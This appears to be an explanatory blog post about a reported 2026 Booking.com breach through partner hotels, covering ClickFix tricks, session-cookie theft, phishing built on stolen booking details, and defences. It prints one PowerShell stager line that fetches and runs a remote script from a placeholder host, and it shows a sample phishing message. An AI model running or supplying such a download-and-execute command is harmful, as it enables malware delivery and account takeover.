In april 13th 2026, online travel agency booking.com issued a major notification that echoed back to 2021. There was unauthorized access to customer PII(Personally Identifiable Information). After the breach, their Public Relations team immediately stated that financial information was not accessed by the threat actors.

The breach most likely did not hit Booking.com’s core servers, but in fact it hit their Supply Chain. The supply chain in this case, refers to the network of partner hotels with a connection to Booking.com. If the hackers can’t or choose not to hack the “big bank” they choose to go to its local branches. The threat actos likely used a tactic called ClickFix where they might have tricked the hotel staff into running a malicious script under the guise of “fixing” a browser error that later on steals their session cookies.Session cookies are the digital ID within your browser that has the function of keeping you logged in. When a hacker steals this, they automatically bypass the need for password and Multi-Factor Authentication completely. To know how malware gets into a system we need to look at a stager. A stager is a small piece of code and its job is to download a malicious payload. The stager is like a delivery tool, for the harmful code. The malware is thus the harmful code that the stager downloads.

Disclaimer: The following code is purely for representation and provided with the intention of educational display.

# CONCEPTUAL REPRESENTATION ONLY — educational purposes
# Modern EDR/AMSI solutions would flag and block this immediately.
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex(New-Object Net.WebClient).DownloadString('https://example.com/malicious-script.ps1')"

-ExecutionPolicy Bypass: Tells the system to ignore local script restrictions.

iex (Invoke-Expression): A common "red flag" command that runs downloaded code directly in the computer's memory.

Although only non-financial data was breached, it is still dangerous and is a major threat. Attackers can take the stolen PII and use it to make up a lie that can seem impossible to ignore. Because the threat actor knows your check in date, hotel name and more information about the registration, you believe the message is actually real.

{
  "guest_name": "Jane Smith",
  "booking_ref": "BK-99210",
  "check_in": "2026-05-14",
  "hotel_name": "Seaside Resort"
}

The message can look something like this: “Hi Jane, your booking BK-99210 for May 14th is at risk. Please verify your payment over here so we can save your booking details.”

Booking.com had a similar breach to this back in 2021 and it was fined €475,000 under The General Data Protection Regulation. Which is a European law which can hit many companies with massive fines if they manage to lose customer/user data.

You do not have t be a tech giant such as Booking.com to be taken as a target. Small businesses are often and have been used in the past as a bridge to leap over to bigger targets or their customer’s wallets. As you could see, this breach was not considered to be high tech but more of a simple one. The humans were the ones exploited along with the companies data systems. The manner to tackle such session hijacking and supply chain vulnerabilities can consist of many measures. First of all you can ensure that your web applications support Device Bound Session Credentials (DBSC). DBSC cryptographically binds a session to the device’s “Trusted Platform Module” When an attacker tries to exfiltrate the cookie to another machine, the session becomes invalid, so the private key never leaves the original set hardware. Another good measure could be enabling PowerShell Constrained Language Mode where you block -ExecutionPolicy Bypass flag for non admin users.

A good take from this breach could be, if you wait for the attack to develop before you secure your systems and partners, you have already lost the battle. Defense must begin also when everything is silent.